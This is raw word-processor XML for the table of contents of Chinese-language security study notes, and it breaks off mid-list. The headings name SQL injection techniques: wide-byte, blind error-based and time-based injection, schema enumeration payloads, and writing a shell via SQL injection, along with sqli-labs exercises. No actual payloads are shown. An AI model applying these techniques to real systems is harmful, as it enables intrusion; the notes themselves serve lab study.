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A8D08D" w:themeColor="accent6" w:themeTint="99"/>
  <w:body>
    <w:p w14:paraId="28B06140" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:firstLineChars="100" w:firstLine="482"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc159779461"/>
      <w:r>
        <w:t>目录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:id w:val="147476834"/>
        <w15:color w:val="DBDBDB"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="118FA0E8" w14:textId="333FC55E" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
          <w:pPr>
            <w:jc w:val="left"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
            </w:rPr>
            <w:t>目录</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="67C6E461" w14:textId="70349E64" w:rsidR="009926EB" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:instrText xml:space="preserve">TOC \o "1-3" \h \u </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc159779461" w:history="1">
            <w:r w:rsidR="009926EB" w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>目录</w:t>
            </w:r>
            <w:r w:rsidR="009926EB">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="009926EB">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="009926EB">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779461 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="009926EB">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="009926EB">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009926EB">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="009926EB">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="54344E9B" w14:textId="563148C7" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779462" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>安全</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779462 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="75B86354" w14:textId="7ECEA093" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779463" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>靶场搭建</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779463 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3DC7713F" w14:textId="25647E85" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779464" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>dnslog</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>搭建</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779464 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="27504EBC" w14:textId="316C36FE" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779465" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SQLi</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779465 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4EE95BC3" w14:textId="19CBDF2F" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779466" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>如何分析</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>mysql</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>的报错</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779466 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="69721D08" w14:textId="69510D45" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779467" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>我的常见误区</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779467 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="59D0A9E6" w14:textId="42DD8D6E" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779468" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>宽字节注入</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779468 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3512CF45" w14:textId="25C9AEBD" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779469" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>直接对</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>columns</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>表进行注入，获取库名</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>表名</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>列名的</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>payload</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779469 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2DA6676E" w14:textId="667D97D7" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779470" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>like</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>匹配</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779470 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="63DAA6DF" w14:textId="4075126B" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779471" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>正则注入</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779471 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5640B6E4" w14:textId="7A24D740" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779472" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>报错盲注</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779472 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0BB528AA" w14:textId="0D6BB045" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779473" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>时间盲注</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779473 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3FE5C172" w14:textId="037199C4" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779474" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>sql</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>注入读写</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>shell</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779474 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6C3B1B63" w14:textId="077CCEA0" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779475" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>无法注释，同时过滤前后单引号</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779475 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3296912A" w14:textId="2DC7563C" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779476" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>sqli-labs</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>特别关注题目</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779476 \h </w:instrText>
            </w:r>
            <w:r>
